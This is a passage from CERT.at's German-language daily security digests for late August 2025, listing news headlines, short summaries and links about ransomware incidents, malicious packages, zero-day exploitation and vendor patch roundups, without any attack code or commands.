connections, or does not require encryption, according to new research. --------------------------------------------- https://www.theregister.com/2025/09/01/isoc_government_domain_traffic_measu… ∗∗∗ SSA Whistleblower’s Resignation Email Mysteriously Disappeared From Inboxes ∗∗∗ --------------------------------------------- Less than 30 minutes after the Social Security Administration’s chief data officer resigned following a whistleblower complaint, recipients could no longer access the resignation email. --------------------------------------------- https://www.wired.com/story/charles-borges-resignation-email-disappearance/ ∗∗∗ Hintertür-Bericht: Britische Regierung will Vollzugriff auf iCloud ∗∗∗ --------------------------------------------- Noch immer ist nicht final entschieden, ob Apple britischen Strafverfolgern Zugriff auf iCloud geben muss. Nun wurde die ganze Datenbreite bekannt. --------------------------------------------- https://www.heise.de/news/Hintertuer-Bericht-Britische-Regierung-will-Vollz… ∗∗∗ Nach Kritik: Ameos Kliniken wollen proaktiv über Datenleak informieren ∗∗∗ --------------------------------------------- Nach einem erfolgreichen Cyberangriff hatte der Klinikkonzern Ameos ein Auskunftsformular bereitgestellt. Nach Kritik wurde selbiges jetzt geändert. --------------------------------------------- https://www.heise.de/news/Ameos-Kliniken-Nach-IT-Angriff-steht-Auskunftsfor… ∗∗∗ IT-Infrastruktur des Innenministeriums "gezielt und professionell" gehackt ∗∗∗ --------------------------------------------- Polizeiliche Daten oder Anwendungen sollen nach eigenen Angaben nicht betroffen sein. Der Angriff fand vor einigen Wochen statt, wurde aber erst jetzt kommuniziert. --------------------------------------------- https://www.derstandard.at/story/3000000285630/cyberangriff-auf-it-infrastr… ∗∗∗ Sweden scrambles after ransomware attack puts sensitive worker data at risk ∗∗∗ --------------------------------------------- Municipal government organisations across Sweden have found themselves impacted after a ransomware attack at a third-party software service supplier. --------------------------------------------- https://www.bitdefender.com/en-us/blog/hotforsecurity/sweden-scrambles-afte… ∗∗∗ Merkwürdige Spam-Mail; Accenture gehackt? ∗∗∗ --------------------------------------------- Ein Blog-Leser hat mich vor einigen Tage darauf hingewiesen, dass er eine merkwürdige Spam-Mail bekam, die von einer Accenture-Domain verschickt wurde. Inzwischen ist die Domain nicht mehr erreichbar – was die Frage nach dem Hintergrund aufwirft. --------------------------------------------- https://www.borncity.com/blog/2025/08/31/accenture-gehackt-merkwuerdige-phi… ∗∗∗ Starker Anstieg der Cyberangriffe auf den Bildungssektor ∗∗∗ --------------------------------------------- Sicherheitsanbieter Check Point warnt vor einem starken Anstieg von Cyber-Angriffen im Bildungssektor: Weltweit um 41 Prozent, in Deutschland sogar plus 56 Prozent. Bildungseinrichtungen verzeichnen im Schnitt mehr als 4300 Angriffe pro Woche, getrieben von saisonalen Phishing-Kampagnen zum Schul- und Semesterstart. --------------------------------------------- https://www.borncity.com/blog/2025/08/31/starker-anstieg-der-cyberangriffe-… ∗∗∗ PromptLock: Erste KI-gestützte Malware von ESET entdeckt ∗∗∗ --------------------------------------------- ESET-Sicherheitsforscher haben die ihrer Meinung nach "erste bekannte KI-gestützte Ransomware" mit dem Namen PromptLock entdeckt. --------------------------------------------- https://www.borncity.com/blog/2025/08/31/promptlock-erste-ki-gestuetzte-mal… ∗∗∗ Citrix Netscaler backdoors — Part One — May 2025 activity against governments ∗∗∗ --------------------------------------------- This is a follow up post to the prior one, part of a series looking at different Netscaler vulnerabilities that have been exploited in the wild as zero days. --------------------------------------------- https://doublepulsar.com/citrix-netscaler-backdoors-part-one-may-2025-activ… ∗∗∗ 8 Malicious NPM Packages Stole Chrome User Data on Windows ∗∗∗ --------------------------------------------- JFrog researchers found eight malicious NPM packages using 70 layers of obfuscation to steal data from Chrome browser users on Windows. The attack highlights a growing threat to developers. --------------------------------------------- https://hackread.com/malicious-npm-packages-stole-chrome-user-data-windows/ ∗∗∗ Widespread Data Theft Targets Salesforce Instances via Salesloft Drift ∗∗∗ --------------------------------------------- Update (August 28) Based on new information identified by GTIG, the scope of this compromise is not exclusive to the Salesforce integration with Salesloft Drift and impacts other integrations. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/data-theft-salesfo… ∗∗∗ ShadowSilk Data Exfiltration Attack ∗∗∗ --------------------------------------------- Nearly three dozen organizations across Central Asia and the Asia-Pacific region, predominantly government agencies, have been compromised in data exfiltration campaigns attributed to the Russian and Chinese-speaking threat group known as ShadowSilk, according to Group-IB. --------------------------------------------- https://fortiguard.fortinet.com/threat-signal-report/6190 ∗∗∗ Vishing: So gelingt der Angriff per Telefon selbst auf Großunternehmen ∗∗∗ --------------------------------------------- Auf der Def Con konnte man sich live ansehen, wie Vishing funktioniert. Erstaunlich oft ergattern Angreifer per Telefon selbst wichtigste Firmeninformationen. --------------------------------------------- https://heise.de/-10625451 ∗∗∗ A16-FuseBypass: Debug Logic Enabled on Production Apple Silicon ∗∗∗ --------------------------------------------- This repository documents a critical hardware-level vulnerability in the Apple A16 Bionic chip used in iPhone 14 Pro Max and related devices. --------------------------------------------- https://github.com/JGoyd/A16-FuseBypass ∗∗∗ KernelSnitch: Side-Channel Attacks on Kernel Data Structures ∗∗∗ --------------------------------------------- In this paper, we present a novel generic software side-channel attack, KernelSnitch, targeting kernel data structures such as hash tables and trees. --------------------------------------------- https://lukasmaar.github.io/papers/ndss25-kernelsnitch.pdf ∗∗∗ Client-side RCE via CSS Injection in Google Web Designer for Windows ∗∗∗ --------------------------------------------- After my recent discovery of two client-side remote code execution vulnerabilities in Google Web Designer (previously disclosed in my articles earlier this year: CVE-2025-1079, CVE-2025-4613), in April 2025 I've found yet another serious issue in the app. --------------------------------------------- https://balintmagyar.com/articles/google-web-designer-css-injection-client-… ∗∗∗ Passkeys are incompatible with open-source software ∗∗∗ --------------------------------------------- After reading more of the spec authors’ comments on open-source Passkey implementations, I cannot support this tech. In addition to what I covered at the bottom of this blog post, I found more instances where the spec authors have expressed positions that are incompatible with open-source software and user freedom. --------------------------------------------- https://www.smokingonabike.com/2025/01/04/passkey-marketing-is-lying-to-you/ ∗∗∗ Wallet-Draining npm Package Impersonates Nodemailer to Hijack Crypto Transactions ∗∗∗ --------------------------------------------- Socket’s Threat Research Team identified a malicious npm package, nodejs-smtp, that impersonates the popular email library nodemailer, which averages roughly 3.9 million weekly downloads, while implanting code into desktop cryptocurrency wallets on Windows. --------------------------------------------- https://socket.dev/blog/wallet-draining-npm-package-impersonates-nodemailer ∗∗∗ The CISO’s Codex – Leo and the Laws of Security ∗∗∗ --------------------------------------------- A a storytelling approach to cybersecurity, where a new CISO named Leo guides his company through foundational security models like Bell-LaPadula, Biba, Clark-Wilson, Brewer-Nash, and Graham-Denning/HRU. --------------------------------------------- https://thecyberthrone.in/2025/08/30/the-cisos-codex-leo-and-the-laws-of-se… ∗∗∗ Nevada Faces Unprecedented Ransomware Attack ∗∗∗ --------------------------------------------- On August 24, 2025, Nevada made headlines as the victim of a historic cyberattack that forced a near-total shutdown of state government operations. --------------------------------------------- https://thecyberthrone.in/2025/08/31/nevada-faces-unprecedented-ransomware-… ===================== = Vulnerabilities = ===================== ∗∗∗ IT-Sicherheitslösung Acronis Cyber Protect Cloud Agent ist verwundbar ∗∗∗ --------------------------------------------- Ein Sicherheitsupdate schließt eine Schwachstelle in Acronis Cyber Protect Cloud Agent. --------------------------------------------- https://www.heise.de/news/IT-Sicherheitsloesung-Acronis-Cyber-Protect-Cloud… ∗∗∗ Qnap: Teils hochriskante Lücken in QTS und QuTS hero geschlossen ∗∗∗ --------------------------------------------- Aktualisierungen für die QTS- und QuTS-hero-Firmwares von Qnap-Geräten schließen als hochriskant eingestuft Sicherheitslücken. --------------------------------------------- https://www.heise.de/news/Qnap-Update-schliesst-teils-hochriskante-Luecken-… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (postgresql16, postgresql:16, python3.11, and thunderbird), Debian (firebird4.0, libcommons-lang3-java, mbedtls, nodejs, openvpn, and ruby-saml), Fedora (cef, chromium, docker-buildx, exiv2, firefox, rocm-rpp, and udisks2), Oracle (postgresql:16), Red Hat (fence-agents, firefox, gdk-pixbuf2, httpd, kernel, kernel-rt, libarchive, libxml2, multiple packages, postgresql, postgresql16, postgresql:15, postgresql:16, python3.11, python3.12, python39:3.9, and thunderbird), Slackware (udisks2), SUSE (go-sendxmpp, helm, ImageMagick, javamail, jq, kea, kernel, libarchive, libsoup, libssh, libxml2, openssl-3, postgresql14, postgresql15, python, python-future, systemd, and xz), and Ubuntu (open-vm-tools and python2.7). --------------------------------------------- https://lwn.net/Articles/1036084/ ∗∗∗ Authenticated Attackers Could Exploit IBM Watsonx Vulnerability to Access Sensitive Data ∗∗∗ --------------------------------------------- A newly disclosed security vulnerability, tracked as CVE-2025-0165, has been reported, specifically concerning the users of the IBM Watsonx Orchestrate Cartridge within the IBM Cloud Pak for Data platform. --------------------------------------------- https://thecyberexpress.com/decoding-cve-2025-0165-flaw/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 29.08.2025
by Daily end-of-shift report 29 Aug '25

29 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 28-08-2025 18:00 − Freitag 29-08-2025 18:00 Handler: Felician Fuchs Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Polizei warnt vor Anrufen von Fake-Innenminister, der Geld will ∗∗∗ --------------------------------------------- Innenminister Karner soll um Spenden für Lösegeldzahlungen gebeten haben. Die Kontaktaufnahme geschah dabei mit einer echten Nummer des Innenministeriums. --------------------------------------------- https://futurezone.at/digital-life/fake-innenminister-karner-anruf-scam-pol… ∗∗∗ Vorsicht! Ankündigung einer Betriebsprüfung durch das Finanzamt ist eine Falle! ∗∗∗ --------------------------------------------- Eine neue Betrugsmasche im Namen des österreichischen Finanzamts macht aktuell die Runde. Diesmal ist es kein Zugangscode, der abläuft. Keine Rückerstattung, die auf ihre Auszahlung wartet. Im aktuellen Fall versuchen Kriminelle, über die Ankündigung einer Betriebsprüfung für Schaden zu sorgen. --------------------------------------------- https://www.watchlist-internet.at/news/falle-finanzamt-betriebspruefung/ ∗∗∗ Citrix forgot to tell you CVE-2025–6543 has been used as a zero day since May 2025 ∗∗∗ --------------------------------------------- Netscaler customers have a problem: the product is on fire. And not in a good way. Serious threat actors are running rings around the product on a regular basis, zero days being exploited regularly, and Citrix/Cloud Software Group simply aren’t being transparent about what is happening with customers so they cannot make real assessments of compromise. Applying patches after already being exploited is not working. --------------------------------------------- https://doublepulsar.com/citrix-forgot-to-tell-you-cve-2025-6543-has-been-u… ∗∗∗ Vorzeitige Beendigung des Supports für SonicWall SMA100 ∗∗∗ --------------------------------------------- Am 31. Oktober 2025 soll Schluss mit dem Support sein, wie es in einer Mitteilung eines SonicWall-Partners heißt. --------------------------------------------- https://www.borncity.com/blog/2025/08/29/vorzeitige-beendigung-des-supports… ∗∗∗ How attackers adapt to built-in macOS protection ∗∗∗ --------------------------------------------- We analyze the built-in protection mechanisms in macOS: how they work, how threat actors can attack them or deceive users, and how to detect such attacks. --------------------------------------------- https://securelist.com/macos-security-and-typical-attacks/117367/ ∗∗∗ Passkeys Pwned: Turning WebAuthn Against Itself ∗∗∗ --------------------------------------------- On the DEFCON 33 main stage, SquareX researchers disclosed a major passkey vulnerability that uses malicious extensions/scripts to fake passkey registration and logins, allowing attackers to access enterprise SaaS apps without the user’s device or biometrics. --------------------------------------------- https://labs.sqrx.com/passkeys-pwned-0dbddb7ade1a ∗∗∗ Ransomware gang takedowns causing explosion of new, smaller groups ∗∗∗ --------------------------------------------- The ransomware ecosystem continues to splinter, with new gangs proliferating in the wake of law enforcement takedowns that have scattered affiliates and prompted criminal rebrands. --------------------------------------------- https://therecord.media/ransomware-gang-takedown-proliferation ===================== = Vulnerabilities = ===================== ∗∗∗ Windows: Zero-Day-Lücke bei der LNK-Anzeige ∗∗∗ --------------------------------------------- Laut ZDI stellte Microsoft sich auf den Standpunkt, dass die Sicherheitslücke nicht den Schweregrad für eine Behandlung erreicht. Auch nach etwa einem halben Jahr hin und her änderte Microsoft seine Meinung dazu nicht. Schließlich hat ZDI die Meldung veröffentlicht und jetzt auch einen CVE-Schwachstelleneintrag dazu herausgegeben. [..] "Die Schwachstelle ermöglicht Angreifern aus dem Netz, beliebigen Code auf betroffenen Installationen von Microsoft Windows auszuführen. Benutzerinteraktion ist für den Missbrauch erforderlich, diese müssen eine bösartige Seite besuchen oder eine bösartige Datei öffnen", schlussfolgert die ZDI. [..] (CVE-2025-9491 / noch kein EUVD, CVSS 7.0, Risiko "hoch") --------------------------------------------- https://heise.de/-10625780 ∗∗∗ FreePBX Servers Targeted by Zero-Day Flaw, Emergency Patch Now Available ∗∗∗ --------------------------------------------- The vulnerability, assigned the CVE identifier CVE-2025-57819, carries a CVSS score of 10.0, indicating maximum severity. "Insufficiently sanitized user-supplied data allows unauthenticated access to FreePBX Administrator, leading to arbitrary database manipulation and remote code execution," the project maintainers said in an advisory. [..] "We are seeing active exploitation of FreePBX in the wild with activity traced back as far as August 21 and backdoors being dropped post-compromise," watchTowr CEO Benjamin Harris said in a statement shared with The Hacker News. --------------------------------------------- https://thehackernews.com/2025/08/freepbx-servers-targeted-by-zero-day.html ∗∗∗ clickstudios Passwordstate 2025-08-28 ∗∗∗ --------------------------------------------- Fixed a potential authentication bypass issue associated with accessing the core Passwordstate Products' Emergency Access page, by using a carefully crafted URL, which could allow access to the Passwordstate Administration section. --------------------------------------------- https://www.clickstudios.com.au/security/advisories/ ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (aide, fence-agents, firefox, kernel-rt, python-cryptography, and thunderbird), Debian (golang-github-gin-contrib-cors, libxml2, and udisks2), Fedora (chromium), Oracle (postgresql16, postgresql:16, python3.11, and thunderbird), Red Hat (lz4 and mpfr), SUSE (chromium, docker, dpkg, firefox, gdk-pixbuf, git, git, git-lfs, obs-scm-bridge, python-PyYAML, gnutls, kernel, libarchive, libxml2, net-tools, netty, perl-Crypt-CBC, polkit, postgresql14, postgresql15, sqlite3, thunderbird, tomcat10, and udisks2), and Ubuntu (linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-intel-iotg, linux-intel-iotg-5.15, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle, linux-raspi, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-6.14, linux-gcp, linux-hwe-6.14, linux-raspi, linux-realtime, linux-realtime-6.14, linux, linux-aws, linux-aws-6.8, linux-gcp, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-oracle, linux-oracle-6.8, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-azure, linux-fips, linux-fips, linux-aws-fips, linux-gcp-fips, linux-gke, linux-hwe-6.8, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-raspi, linux-gke, linux-kvm, linux-oem-6.14, linux-realtime, linux-intel-iot-realtime, linux-realtime, linux-raspi-realtime, openldap, and udisks2). --------------------------------------------- https://lwn.net/Articles/1035724/ ∗∗∗ QNAP: Multiple Vulnerabilities in File Station 5 ∗∗∗ --------------------------------------------- https://www.qnap.com/en-us/security-advisory/QSA-25-19 ∗∗∗ QNAP: Multiple Vulnerabilities in QTS and QuTS hero ∗∗∗ --------------------------------------------- https://www.qnap.com/en-us/security-advisory/QSA-25-21 ∗∗∗ Tenable: [R1] Stand-alone Security Patches Available for Tenable Security Center versions 6.4.x, 6.5.1 and 6.6.0: SC-202508.1 ∗∗∗ --------------------------------------------- https://www.tenable.com/security/tns-2025-17 ∗∗∗ Mitsubishi Electric MELSEC iQ-F Series CPU Module ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-240-01 ∗∗∗ Mitsubishi Electric MELSEC iQ-F Series CPU Module ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-240-02 ∗∗∗ GE Vernova CIMPLICITY ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-240-06 ∗∗∗ Delta Electronics CNCSoft-G2 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-240-04 ∗∗∗ Delta Electronics COMMGR ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-240-05 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 28.08.2025
by Daily end-of-shift report 28 Aug '25

28 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 27-08-2025 18:00 − Donnerstag 28-08-2025 18:00 Handler: Guenes Holler Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Experimental PromptLock ransomware uses AI to encrypt, steal data ∗∗∗ --------------------------------------------- Threat researchers discovered the first AI-powered ransomware, called PromptLock, that uses Lua scripts to steal and encrypt data on Windows, macOS, and Linux systems. The malware uses OpenAI’s gpt-oss:20b model through the Ollama API to dynamically generate the malicious Lua scripts from hard-coded prompts. --------------------------------------------- https://www.bleepingcomputer.com/news/security/experimental-promptlock-rans… ∗∗∗ ZipLine Phishers Flip Script as Victims Email First ∗∗∗ --------------------------------------------- "ZipLine" appears to be a sophisticated and carefully planned campaign that has already affected dozens of small, medium, and large A financially motivated threat actor is flipping the phishing playbook by getting victims to make the first email contact with the attacker rather than the other way around. The scam involves the adversary hitting up Contact Us forms on company websites under the guise of partnership inquiries or other business pretexts and waiting for the target to respond. Over a couple of weeks, they build credibility with carefully crafted, professional-sounding emails before hitting their mark with a weaponized zip file. --------------------------------------------- https://www.darkreading.com/cyberattacks-data-breaches/zipline-phishers-vic… ∗∗∗ AppSuite PDF Editor Backdoor: A Detailed Technical Analysis ∗∗∗ --------------------------------------------- Some threat actors are bold enough to submit their own malware as false positive to antivirus companies and demand removal of the detection. This is exactly what happened with AppSuite PDF Editor. Initially, automation flagged it as a potentially unwanted program—a verdict that is typically reserved for legitimate software with shady features like unwanted advertisement or installation of third-party programs without proper consent. In the case of AppSuite, however, we found a backdoor. --------------------------------------------- https://feeds.feedblitz.com/~/923960972/0/gdatasecurityblog-en~AppSuite-PDF… ∗∗∗ Schweden: Cyberangriff legt Systeme Hunderter Kommunen lahm ∗∗∗ --------------------------------------------- Ein schwedischer IT-Dienstleister namens Miljödata ist offenbar Ziel einer folgenschweren Cyberattacke geworden. Einem Bericht von Bleeping Computer(öffnet im neuen Fenster) zufolge soll der Angriff in mehr als 200 schwedischen Verwaltungen zu Ausfällen führen. Bei dem Nachrichtenportal Sweden Herald(öffnet im neuen Fenster) ist sogar von 250 betroffenen Kunden die Rede, von denen mindestens 164 Kommunalverwaltungen sein sollen. --------------------------------------------- https://www.golem.de/news/schweden-cyberangriff-legt-systeme-hunderter-komm… ∗∗∗ Malicious Screen Connect Campaign Abuses AI-Themed Lures for Xworm Delivery ∗∗∗ --------------------------------------------- During a recent Advanced Continual Threat Hunt (ACTH) investigation, the Trustwave SpiderLabs Threat Hunt team identified a deceptive campaign that abused fake AI-themed content to lure users into executing a malicious, pre-configured ScreenConnect installer. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/malicious-s… ∗∗∗ Mehr als 28.000 Netscaler-Instanzen anfällig für Citrix Bleed 3 ∗∗∗ --------------------------------------------- Am Mittwoch wurde bekannt, dass Schwachstellen in den Netscalern (ADC und Gateways) von Citrix angegriffen werden, die bereits als "Citrix Bleed 3" tituliert werden. Die Shadowserver Foundation hat am Mittwoch Zahlen veröffentlicht, denen zufolge weltweit am Dienstag noch mehr als 28.000 Systeme für die Lücke "Citrix Bleed 3" verwundbar sind. Angreifer können darauf vermutlich die Schwachstellen missbrauchen. --------------------------------------------- https://www.heise.de/news/Mehr-als-28-000-Netscaler-Instanzen-anfaellig-fue… ∗∗∗ Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System ∗∗∗ --------------------------------------------- People’s Republic of China (PRC) state-sponsored cyber threat actors are targeting networks globally, including, but not limited to, telecommunications, government, transportation, lodging, and military infrastructure networks. While these actors focus on large backbone routers of major telecommunications providers, as well as provider edge (PE) and customer edge (CE) routers, they also leverage compromised devices and trusted connections to pivot into other networks. These actors often modify routers to maintain persistent, long-term access to networks. --------------------------------------------- https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a ∗∗∗ Microsoft warnt: Ransomware-Gruppe Storm-0501 greift (Azure) Cloud an, verlangt Zahlungen ∗∗∗ --------------------------------------------- Microsoft warnt vor der finanziell motivierten Gruppe Storm-0501, die kontinuierlich mit Angriffen auf Cloud-Instanzen (Azure) zielt. Bei Erfolg werden Daten abgezogen, dann die Originale verschlüsselt und Backups zerstört. Anschließend wird Lösegeld verlangt. --------------------------------------------- https://www.borncity.com/blog/2025/08/28/microsoft-warnt-ransomware-gruppe-… ∗∗∗ Zip Slip, Path Traversal Vulnerability during File Decompression ∗∗∗ --------------------------------------------- Path traversal or directory traversal vulnerabilities are security vulnerabilities that occur mainly due to improper validation of user inputs. Attackers can read, modify, or even create new files that are originally inaccessible or located in unintended paths using relative or absolute paths. Although these vulnerabilities have been known for a long time, they are still being discovered in various environments and applications, not just web environments. This article examines Zip Slip, a path traversal vulnerability that occurs during the file decompression process of compression programs, and aims to introduce its main vulnerabilities. --------------------------------------------- https://asec.ahnlab.com/en/89890/ ∗∗∗ Thousands of Developer Credentials Stolen in macOS “s1ngularity” Attack ∗∗∗ --------------------------------------------- A supply chain attack called “s1ngularity” on Nx versions 20.9.0-21.8.0 stole thousands of developer credentials. The attack targeted macOS and AI tools, according to GitGuardian’s analysis. --------------------------------------------- https://hackread.com/developer-credentials-stolen-macos-s1ngularity-attack/ ∗∗∗ Cisco: Mehrere Produkte mit teils hochriskanten Lücken ∗∗∗ --------------------------------------------- Der Netzwerkausrüster Cisco hat am Mittwoch zehn neue Sicherheitsmeldungen herausgegeben. Sie behandeln teils hochriskante Schwachstellen in mehreren Produkten. --------------------------------------------- https://heise.de/-10623826 ∗∗∗ Referral Beware, Your Rewards are Mine (Part 1) ∗∗∗ --------------------------------------------- Referral rewards programs are nearly ubiquitous today, from consumer tech to SaaS companies, but are rarely given much security oversight. In this blog post we’ll dig into the common technical implementations of rewards programs on web apps, common security issues with each approach, and recommendations for secure development of similar programs. In a subsequent post, we’ll explore real-world examples of these vulnerability classes in detail. --------------------------------------------- https://rhinosecuritylabs.com/research/referral-beware-your-rewards-are-min… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (aide, firefox, kernel, and mod_http2), Debian (chromium and unbound), Fedora (mod_auth_openidc), Oracle (fence-agents and kernel), SUSE (ignition, jetty-minimal, kernel, libmozjs-128-0, matrix-synapse, postgresql13, postgresql15, postgresql16, and postgresql17), and Ubuntu (kernel). --------------------------------------------- https://lwn.net/Articles/1035464/ ∗∗∗ Libbiosig, Tenda, SAIL, PDF XChange, Foxit vulnerabilities ∗∗∗ --------------------------------------------- https://blog.talosintelligence.com/libbiosig-tenda-sail-pdf-xchange-foxit-v… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 27.08.2025
by Daily end-of-shift report 27 Aug '25

27 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Dienstag 26-08-2025 18:00 − Mittwoch 27-08-2025 18:00 Handler: Felician Fuchs Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Cyberangriff auf Ameos: Großer Klinikverbund erleidet Datenklau ∗∗∗ --------------------------------------------- Daten von Patienten und Mitarbeitern der Ameos Gruppe sind in die Hände Cyberkrimineller gelangt. Betroffene können jetzt Details anfragen. --------------------------------------------- https://www.golem.de/news/cyberangriff-auf-ameos-grosser-klinikverbund-erle… ∗∗∗ Schadcode im Anmarsch: Aktiv ausgenutzte Git-Lücke gefährdet Entwickler ∗∗∗ --------------------------------------------- Wer Git im Einsatz hat, sollte die Software dringend aktualisieren. Angreifer bedienen sich einer Sicherheitslücke, um Schadcode einzuschleusen. --------------------------------------------- https://www.golem.de/news/schadcode-im-anmarsch-aktiv-ausgenutzte-git-lueck… ∗∗∗ Cyber-Dome: Bundesregierung plant stärkere Cyberabwehr ∗∗∗ --------------------------------------------- Die Pläne zu einer besseren Cyberabwehr sind noch sehr vage. Ein Gesetzentwurf von Alexander Dobrindt soll bis Ende 2025 kommen. --------------------------------------------- https://www.golem.de/news/cyber-dome-bundesregierung-plant-staerkere-cybera… ∗∗∗ US-Regierung steigt bei Intel ein: Krypto-Funktionen weiter vertrauenswürdig? ∗∗∗ --------------------------------------------- Der Einstieg der US-Regierung bei Intel unterminiert Funktionen wie Confidential Computing und "souveräne Cloud". --------------------------------------------- https://www.heise.de/news/Intel-Chips-USA-inside-10622136.html ∗∗∗ Google Chrome: Update schließt kritische Sicherheitslücke ∗∗∗ --------------------------------------------- Im Webbrowser Google Chrome haben die Entwickler eine Sicherheitslücke geschlossen, die als kritisches Risiko eingestuft wurde. Wer den Browser einsetzt, sollte sicherstellen, die jüngste Version zu nutzen. --------------------------------------------- https://www.heise.de/news/Google-Chrome-Update-schliesst-kritische-Sicherhe… ∗∗∗ Paypal: Deutsche Banken blockierten offenbar Zahlungen von Milliarden Euro ∗∗∗ --------------------------------------------- Die Süddeutsche Zeitung berichtet, dass Deutsche Banken Zahlungen an Paypal gestoppt hatten. Auslöser war ein Sicherheitsproblem. --------------------------------------------- https://www.heise.de/news/Paypal-Deutsche-Banken-blockierten-offenbar-Zahlu… ∗∗∗ Governments, tech companies meet in Tokyo to share tips on fighting North Korea IT worker scheme ∗∗∗ --------------------------------------------- The U.S. State Department said it worked with the Ministries of Foreign Affairs in Japan and South Korea to organize the forum, which had more than 130 attendees from freelance work platforms, payment service providers, cryptocurrency companies, AI firms and more. --------------------------------------------- https://therecord.media/japan-us-south-korea-forum-north-korea-it-worker-sc… ∗∗∗ Widespread Data Theft Targets Salesforce Instances via Salesloft Drift ∗∗∗ --------------------------------------------- Google Threat Intelligence Group (GTIG) is issuing an advisory to alert organizations about a widespread data theft campaign, carried out by the actor tracked as UNC6395. Beginning as early as Aug. 8, 2025 through at least Aug. 18, 2025, the actor targeted Salesforce customer instances through compromised OAuth tokens associated with the Salesloft Drift third-party application. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/data-theft-salesfo… ∗∗∗ The One Where We Just Steal The Vulnerabilities (CrushFTP CVE-2025-54309) ∗∗∗ --------------------------------------------- As we’ve all experienced in 2025, 2025 has been the year of vendors burying their heads in the sand with regard to in-the-wild exploitation, even in the face of impressively indisputable evidence, and using their status as a CNA to somehow get CVEs with suspiciously similar identifiers to the point that confusion appears almost intentional. --------------------------------------------- https://labs.watchtowr.com/the-one-where-we-just-steal-the-vulnerabilities-… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (node-cipher-base), Fedora (keylime-agent-rust and libtiff), Oracle (aide, kernel, mod_http2, pam, pki-deps:10.6, python-cryptography, python3, python3.12, and thunderbird), SUSE (cheat, ffmpeg, firebird, govulncheck-vulndb, postgresql17, tomcat, tomcat10, tomcat11, ucode-intel-20250812, and v2ray-core), and Ubuntu (binutils, gst-plugins-base1.0, gst-plugins-good1.0, and linux-raspi-realtime). --------------------------------------------- https://lwn.net/Articles/1035307/ ∗∗∗ Malicious versions of Nx and some supporting plugins were published ∗∗∗ --------------------------------------------- https://github.com/nrwl/nx/security/advisories/GHSA-cxm3-wv7p-598c -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 26.08.2025
by Daily end-of-shift report 26 Aug '25

26 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Montag 25-08-2025 18:00 − Dienstag 26-08-2025 18:00 Handler: Felician Fuchs Co-Handler: Alexander Riepl ===================== = News = ===================== ∗∗∗ New AI attack hides data-theft prompts in downscaled images ∗∗∗ --------------------------------------------- Researchers have developed a novel attack that steals user data by injecting malicious prompts in images processed by AI systems before delivering them to a large language model. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-ai-attack-hides-data-the… ∗∗∗ ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners ∗∗∗ --------------------------------------------- A new large-scale campaign has been observed exploiting over 100 compromised WordPress sites to direct site visitors to fake CAPTCHA verification pages that employ the ClickFix social engineering tactic to deliver information stealers, ransomware, and cryptocurrency miners.The large-scale cybercrime campaign, first detected in August 2025, .. --------------------------------------------- https://thehackernews.com/2025/08/shadowcaptcha-exploits-wordpress-sites.ht… ∗∗∗ Malware-ridden apps made it into Googles Play Store, scored 19 million downloads ∗∗∗ --------------------------------------------- Everythings fine, the ad slinger assures us Cloud security vendor Zscaler says customers of Google’s Play Store have downloaded more than 19 million instances of malware-laden apps that evaded the web giant’s security scans. --------------------------------------------- https://www.theregister.com/2025/08/26/apps_android_malware/ ∗∗∗ Sicherheitsupdates: Unbefugte Zugriffe auf GitHub Enterprise Server möglich ∗∗∗ --------------------------------------------- Eine Sicherheitslücke bedroht GitHub Enterprise Server. Admins sollten die gepatchte Ausgabe zeitnah installieren. --------------------------------------------- https://www.heise.de/news/Sicherheitsupdates-Unbefugte-Zugriffe-auf-GitHub-… ∗∗∗ ScreenConnect-Admins im Visier von Spear-Phishing-Angriffen ∗∗∗ --------------------------------------------- Derzeit läuft eine Phishing-Kampagne, die Zugangsdaten zu ScreenConnect abgreift. Die Angreifer wollen Ransomware platzieren. --------------------------------------------- 